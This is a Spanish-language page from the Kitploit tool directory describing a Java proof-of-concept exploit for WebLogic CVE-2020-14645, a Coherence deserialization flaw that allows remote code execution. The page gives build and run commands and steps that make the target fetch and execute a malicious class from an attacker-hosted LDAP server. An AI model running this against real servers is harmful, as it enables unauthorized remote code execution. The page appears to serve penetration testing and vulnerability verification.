Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Weblogic_CVE-2020-14645 — PoC en Java para RCE por deserialización de Coherence en WebLogic CVE-2020-14645. Aloja una clase maliciosa vía LDAP y desencadena ejecución remota de código en servidores WebLogic vulnerables. | Kitploit
Herramientas/GitHubGitHub/jlvsjp/weblogic_cve-2020-14645
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHub
jlvsjp/weblogic_cve-2020-14645

Weblogic_CVE-2020-14645

PoC en Java para RCE por deserialización de Coherence en WebLogic CVE-2020-14645. Aloja una clase maliciosa vía LDAP y desencadena ejecución remota de código en servidores WebLogic vulnerables.

Ver Repositorio
16hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Weblogic CVE-2020-14645 coherence programa de verificación de vulnerabilidad de deserialización

Entorno

  • Maven 3

  • JDK 1.8

Compilación

root@kitploit:~
mvn package

Uso

Pasos específicos de prueba:

  1. Escribir el POC
  2. Compilar el POC a un archivo class
  3. Iniciar un sitio estático para publicar el POC compilado
  4. Iniciar un proxy LDAP para reenviar las solicitudes de obtención del POC del objetivo de prueba
  5. Ejecución del programa de prueba

Dado que esta vulnerabilidad es similar a la vulnerabilidad de Apache Dubbo, consulte esa vulnerabilidad para implementar los pasos 1-4.

Ejecución del programa de prueba

root@kitploit:~
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL # Ejemplo java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001 java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002

Si se utiliza el POC proporcionado en este ejemplo, tras una explotación exitosa el objetivo de prueba ejecutará calc.exe. Modifique el POC según el entorno del objetivo de prueba.

Agradecimientos

Este proyecto hace referencia y cita parte del código de los proyectos @Y4er @5up3rc, ¡muchas gracias!

Referencias

https://github.com/Y4er/CVE-2020-14645

https://github.com/5up3rc/weblogic_cmd

Descargar herramienta